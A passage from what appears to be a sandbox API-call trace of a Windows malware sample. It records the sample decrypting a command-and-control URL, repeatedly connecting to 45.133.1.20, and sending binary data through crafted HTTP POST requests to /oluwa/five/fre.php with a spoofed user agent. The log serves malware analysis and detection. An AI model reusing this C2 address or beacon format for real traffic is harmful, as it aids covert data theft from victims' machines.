ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0254.616] GetProcessHeap () returned 0x6a0000 [0254.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0254.616] socket (af=2, type=1, protocol=6) returned 0x880 [0254.617] connect (s=0x880, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0254.645] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0254.645] GetProcessHeap () returned 0x6a0000 [0254.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0254.645] GetProcessHeap () returned 0x6a0000 [0254.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0254.646] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.647] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.647] GetProcessHeap () returned 0x6a0000 [0254.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db1c8 [0254.647] GetProcessHeap () returned 0x6a0000 [0254.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.647] GetProcessHeap () returned 0x6a0000 [0254.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0254.647] GetProcessHeap () returned 0x6a0000 [0254.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0254.648] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.650] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.650] GetProcessHeap () returned 0x6a0000 [0254.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0254.650] GetProcessHeap () returned 0x6a0000 [0254.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.650] send (s=0x880, buf=0x6bd460*, len=242, flags=0) returned 242 [0254.651] send (s=0x880, buf=0x6bb998*, len=159, flags=0) returned 159 [0254.654] GetProcessHeap () returned 0x6a0000 [0254.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0254.654] recv (in: s=0x880, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0254.725] GetProcessHeap () returned 0x6a0000 [0254.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0254.725] GetProcessHeap () returned 0x6a0000 [0254.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0254.726] GetProcessHeap () returned 0x6a0000 [0254.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db1c8 | out: hHeap=0x6a0000) returned 1 [0254.726] GetProcessHeap () returned 0x6a0000 [0254.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0254.731] closesocket (s=0x880) returned 0 [0254.732] GetProcessHeap () returned 0x6a0000 [0254.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0254.732] GetProcessHeap () returned 0x6a0000 [0254.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.733] GetProcessHeap () returned 0x6a0000 [0254.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0254.733] GetProcessHeap () returned 0x6a0000 [0254.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0254.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b0) returned 0x880 [0254.736] Sleep (dwMilliseconds=0xea60) [0254.737] GetProcessHeap () returned 0x6a0000 [0254.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0254.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.740] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0254.758] GetProcessHeap () returned 0x6a0000 [0254.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0254.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.759] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0254.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.760] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.764] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.764] GetProcessHeap () returned 0x6a0000 [0254.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0254.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.766] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0254.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.767] CryptDestroyKey (hKey=0x6ad020) returned 1 [0254.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.768] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0254.768] GetProcessHeap () returned 0x6a0000 [0254.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.779] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.781] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.785] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.786] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.786] GetProcessHeap () returned 0x6a0000 [0254.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0254.786] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.787] GetProcessHeap () returned 0x6a0000 [0254.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0254.787] GetProcessHeap () returned 0x6a0000 [0254.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.787] GetProcessHeap () returned 0x6a0000 [0254.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0254.788] GetProcessHeap () returned 0x6a0000 [0254.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0254.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.789] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0254.804] GetProcessHeap () returned 0x6a0000 [0254.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0254.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.808] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0254.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.809] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.811] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.811] GetProcessHeap () returned 0x6a0000 [0254.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0254.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.813] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0254.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.814] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0254.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.818] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0254.818] GetProcessHeap () returned 0x6a0000 [0254.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0254.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0254.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.822] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0254.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0254.823] GetProcessHeap () returned 0x6a0000 [0254.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0254.823] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0254.823] GetProcessHeap () returned 0x6a0000 [0254.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0254.823] socket (af=2, type=1, protocol=6) returned 0x884 [0254.823] connect (s=0x884, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0254.850] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0254.850] GetProcessHeap () returned 0x6a0000 [0254.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0254.850] GetProcessHeap () returned 0x6a0000 [0254.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0254.851] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.852] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.852] GetProcessHeap () returned 0x6a0000 [0254.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db648 [0254.852] GetProcessHeap () returned 0x6a0000 [0254.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.853] GetProcessHeap () returned 0x6a0000 [0254.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0254.853] GetProcessHeap () returned 0x6a0000 [0254.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0254.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.856] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.856] GetProcessHeap () returned 0x6a0000 [0254.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0254.856] GetProcessHeap () returned 0x6a0000 [0254.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.857] send (s=0x884, buf=0x6bd460*, len=242, flags=0) returned 242 [0254.857] send (s=0x884, buf=0x6bb998*, len=159, flags=0) returned 159 [0254.857] GetProcessHeap () returned 0x6a0000 [0254.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0254.857] recv (in: s=0x884, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0254.932] GetProcessHeap () returned 0x6a0000 [0254.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0254.936] GetProcessHeap () returned 0x6a0000 [0254.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0254.936] GetProcessHeap () returned 0x6a0000 [0254.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db648 | out: hHeap=0x6a0000) returned 1 [0254.937] GetProcessHeap () returned 0x6a0000 [0254.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0254.937] closesocket (s=0x884) returned 0 [0254.938] GetProcessHeap () returned 0x6a0000 [0254.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0254.938] GetProcessHeap () returned 0x6a0000 [0254.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.938] GetProcessHeap () returned 0x6a0000 [0254.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0254.939] GetProcessHeap () returned 0x6a0000 [0254.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0254.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b4) returned 0x884 [0254.956] Sleep (dwMilliseconds=0xea60) [0254.958] GetProcessHeap () returned 0x6a0000 [0254.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0254.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.960] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0254.985] GetProcessHeap () returned 0x6a0000 [0254.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0254.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.986] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0254.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.990] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.991] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.991] GetProcessHeap () returned 0x6a0000 [0254.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0254.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.994] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0254.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.995] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0254.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.996] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0254.996] GetProcessHeap () returned 0x6a0000 [0254.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.000] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.001] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.003] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.004] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.004] GetProcessHeap () returned 0x6a0000 [0255.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.004] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.005] GetProcessHeap () returned 0x6a0000 [0255.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.005] GetProcessHeap () returned 0x6a0000 [0255.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.006] GetProcessHeap () returned 0x6a0000 [0255.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0255.007] GetProcessHeap () returned 0x6a0000 [0255.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0255.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.008] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0255.034] GetProcessHeap () returned 0x6a0000 [0255.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.035] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.036] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.038] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.038] GetProcessHeap () returned 0x6a0000 [0255.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.039] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0255.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.041] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.045] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0255.045] GetProcessHeap () returned 0x6a0000 [0255.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.046] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0255.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.047] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0255.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.048] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0255.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.050] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0255.050] GetProcessHeap () returned 0x6a0000 [0255.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.050] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0255.050] GetProcessHeap () returned 0x6a0000 [0255.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0255.050] socket (af=2, type=1, protocol=6) returned 0x888 [0255.050] connect (s=0x888, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0255.089] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0255.089] 